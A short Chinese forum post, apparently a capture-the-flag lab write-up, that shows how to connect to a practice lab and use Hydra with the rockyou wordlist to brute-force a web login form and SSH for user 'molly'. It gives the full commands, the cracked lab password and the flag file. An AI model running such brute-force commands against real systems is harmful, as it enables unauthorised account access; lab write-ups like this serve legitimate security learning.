-
-
[原创]记录下hydra的用法,靶场简单测试
-
发表于: 6天前 463
-
hydra是kali自带的一个密码爆破软件,支持多种协议。包括ssl,http-post等等。
先连靶场,在靶场的网页上下载openvpn的配置文件。

ovpn后缀的文件放到虚拟机kali里。然后,
$ sudo openvpn /home/kali/Downloads/ap-south-1-yoyozisama-regular.ovpn
然后会显示这个,算是连上了,保持这个窗口不关闭,打开另一个终端操作。

浏览器输入靶机ip,长这样

可以看到ip后面有个/login,所以可以这样构造hydra命令
$ hydra -l molly -P rockyou.txt 10.49.143.80 http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect"
molly是username, rockyou.txt是密码字典,默认在/usr/share/wordlists文件夹
结果:

然后是破解ssh密码:
命令如下
$ hydra -l molly -P rockyou.txt 10.49.143.80 ssh
结果:

密码是butterfly
然后连上ssh:
$ ssh molly@10.49.143.80
输入密码,登录。

看到flag2.txt。结束
赞赏
他的文章
赞赏
雪币:
留言: